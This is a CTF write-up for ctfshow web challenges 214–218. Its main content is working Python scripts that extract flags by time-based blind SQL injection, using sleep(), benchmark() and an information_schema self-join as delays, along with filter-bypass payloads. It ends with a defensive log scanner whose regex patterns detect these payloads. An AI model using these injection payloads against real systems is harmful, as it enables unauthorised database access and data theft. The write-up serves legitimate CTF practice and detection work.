
ctfshow: Web Getting Started 214~218 (time-based blind injection begins)

Web Getting Started 214

#@another:uwvwko
import requests

url = 'http://b0c11589-31c9-4bf9-8b66-6b5a1fc08726.challenge.ctf.show/api/index.php'
flag = ''
# candidate characters; named 'charset' instead of 'str' so the builtin is not shadowed
charset = '{-_1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM}'
for i in range(1, 50):
    for j in charset:
        # list tables in the current database
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # list column names (id, flag)
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        # read the data
        payload = "select flaga from ctfshow_flagx"
        # the server sleeps 3 s only when the i-th character of the result equals j
        data = {'ip': f"if(substr(({payload}),{i},1)='{j}',sleep(3),0)", 'debug': '1'}
        r = requests.post(url, data=data)
        if r.elapsed.total_seconds() > 2:
            flag += j
            print(flag)
            break

Web Getting Started 215

#@uwvwko
import requests

url = 'http://17ae312d-8d89-42f7-b881-b9068c90093b.challenge.ctf.show/api/'
flag = ''
charset = 'abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
for i in range(1, 60):
    for j in charset:
        payload = {
            # 'ip': f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1)='{j}',sleep(3),'False')#",
            # 'ip': f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{i},1)='{j}',sleep(3),'False')#",
            # this time the parameter sits inside a string literal, so the payload opens with 1'
            'ip': f"1' or if(substr((select group_concat(flagaa) from ctfshow_flagxc),{i},1)='{j}',sleep(3),'False')#",
            'debug': 0,
        }
        r = requests.post(url, data=payload)
        if r.elapsed.total_seconds() > 2:
            flag += j
            print(flag)
            break

(Why is there an A class?)

Web Getting Started 216

The parameter goes through base64 decoding, but we can simply close the call with ).

For example: where id = from_base64(0)payload

Script:

import requests

url = 'http://c5791659-334c-48d2-833a-1f0c9fa90735.challenge.ctf.show/api/'
charset = 'abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''
for j in range(1, 50):
    for k in charset:
        # payload = {'debug': '0', 'ip': f"1)or if(substr(database(),{j},1)='{k}',sleep(3),0)#"}  # guess the database name
        # payload = {'debug': '0', 'ip': f"1)or if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {j}, 1) = '{k}',sleep(3),0)#"}  # guess the table name
        # payload = {'debug': '0', 'ip': f"1)or if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {j}, 1) = '{k}',sleep(3),0)#"}  # guess the table names
        # payload = {'debug': '0', 'ip': f"1)or if(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flagxcc'), {j}, 1) = '{k}',sleep(3),0)#"}  # guess the column name
        # the leading ) closes from_base64( and the trailing # comments out the rest of the query
        payload = {'debug': '0', 'ip': f"1)or if(substr((select flagaac from ctfshow_flagxcc), {j}, 1) = '{k}',sleep(3),0)#"}
        r = requests.post(url, data=payload)  # 'r' rather than 're', which is a module name
        if r.elapsed.total_seconds() > 2:
            flag += k
            print(flag)
            break

Web Getting Started 217

sleep is filtered.

After looking at payloads from more experienced players, we can use benchmark instead.

benchmark(count, expr) evaluates the expression expr count times, which makes the query take a long time to process.

With the values below it takes about 3 seconds, so we can start writing the script.

import requests

url = 'http://4baeb3f2-07a1-438f-a1a6-6e984cf82339.challenge.ctf.show/api/'
charset = 'abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''
for i in range(1, 60):
    for j in charset:
        payload = {
            'debug': '1',
            # 'ip': f"if(substr(database(),{i},1)='{j}',benchmark(3000000,md5('myon')),0)",  # guess the database name
            # 'ip': f"if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {i}, 1) = '{j}',benchmark(3000000,md5('12354')),0)",  # guess the table name
            # 'ip': f"if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {i}, 1) = '{j}',benchmark(3000000,md5('12345')),0)",  # guess the table names
            # 'ip': f"if(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flagxccb'), {i}, 1) = '{j}',benchmark(3000000,md5('123415')),0)",  # guess the column name
            # benchmark() stands in for the filtered sleep(): 3,000,000 md5() calls take roughly 3 s
            'ip': f"if(substr((select flagaabc from ctfshow_flagxccb), {i}, 1) = '{j}',benchmark(3000000,md5('12345')),0)",
        }
        r = requests.post(url, data=payload)
        if r.elapsed.total_seconds() > 2:
            flag += j
            print(flag)
            break

Web Getting Started 218

benchmark is banned as well.

Script:

import requests

url = 'http://04ce659f-5b93-475f-8526-203b887d0719.challenge.ctf.show/api/'
charset = 'abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''
# substr() positions start at 1; position 0 returns '' and can never match a character
for i in range(1, 60):
    for j in charset:
        payload = {
            'debug': '1',
            # 'ip': f"if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')",
            # 'ip': f"if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')",
            # with benchmark() filtered too, a cross join of information_schema.columns with itself supplies the delay
            'ip': f"if(substr((select group_concat(flagaac) from ctfshow_flagxc),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')",
        }
        r = requests.post(url, data=payload)
        # the join is much quicker than sleep(3); tune this threshold on your own machine
        if r.elapsed.total_seconds() > 0.4:
            flag += j
            print(flag)
            break

(SELECT count(*) FROM information_schema.columns A, information_schema.columns B) is a time-consuming, resource-heavy operation. The timing threshold has to be tuned on your own machine, and the flag that gets printed may contain errors.
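As an added defensive counterpart (not part of the original write-up), the script below scans web-server log lines for the three delay primitives used in challenges 214 to 218 (sleep(), benchmark(), and the information_schema self-join) together with the if(substr(...)) extraction shell that every script above shares, and correlates them with the response time. The log format, the source addresses and the sample lines are constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Delay primitives seen across challenges 214-218: sleep(), benchmark(), and a
# cross join of information_schema.columns with itself that has no join condition.
DELAY_PATTERNS = {
    "sleep": re.compile(r"\bsleep\s*\(", re.I),
    "benchmark": re.compile(r"\bbenchmark\s*\(\s*\d+", re.I),
    "heavy_join": re.compile(
        r"\bfrom\s+information_schema\.\w+\s+\w+\s*,\s*information_schema\.\w+", re.I),
}
# The conditional shell all the scripts share: if(substr(<query>, i, 1)='<c>', <delay>, ...)
EXTRACT_PATTERN = re.compile(r"\bif\s*\(\s*substr(?:ing)?\s*\(", re.I)

# Assumed log format (constructed, not from the page): source, timestamp, quoted URL-encoded body, response ms.
LOG_RE = re.compile(r'^(?P<src>\S+) (?P<ts>\S+) "(?P<body>[^"]*)" (?P<ms>\d+)$')

# Constructed sample lines; the bodies mirror the payload shapes shown in this write-up.
SAMPLE_LOG = """\
203.0.113.5 2024-01-01T10:00:00Z "ip=if(substr((select+flaga+from+ctfshow_flagx),1,1)='c',sleep(3),0)&debug=1" 3012
203.0.113.5 2024-01-01T10:00:04Z "ip=1'+or+if(substr((select+group_concat(flagaa)+from+ctfshow_flagxc),2,1)='t',sleep(3),'False')%23&debug=0" 21
203.0.113.5 2024-01-01T10:00:05Z "ip=if(substr((select+flagaabc+from+ctfshow_flagxccb),3,1)='f',benchmark(3000000,md5('12345')),0)&debug=1" 2890
203.0.113.5 2024-01-01T10:00:09Z "ip=if(substr((select+group_concat(flagaac)+from+ctfshow_flagxc),4,1)='s',(SELECT+count(*)+FROM+information_schema.columns+A,+information_schema.columns+B),'False')&debug=1" 640
198.51.100.7 2024-01-01T10:00:10Z "ip=10.0.0.1&debug=0" 15
""".splitlines()

def classify(body, elapsed_ms, slow_ms=2000):
    """Return the indicator names found in one URL-encoded request body."""
    decoded = unquote_plus(body)
    hits = [name for name, rx in DELAY_PATTERNS.items() if rx.search(decoded)]
    if EXTRACT_PATTERN.search(decoded):
        hits.append("conditional_extract")
    # a delay primitive plus a slow response is exactly the signal the scripts key on
    if hits and elapsed_ms >= slow_ms:
        hits.append("delay_observed")
    return hits

def scan(lines, slow_ms=2000):
    """Parse log lines; return (flagged requests, flagged-request count per source)."""
    findings, per_source = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m["body"], int(m["ms"]), slow_ms)
        if hits:  # one entry per guessed character, so the per-source count climbs quickly
            findings.append((m["src"], hits))
            per_source[m["src"]] += 1
    return findings, per_source
```

Lower slow_ms (the 218 script uses 0.4 s) when the delay comes from the information_schema join rather than sleep(3), otherwise the fourth line is flagged on its payload alone and not on its timing.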
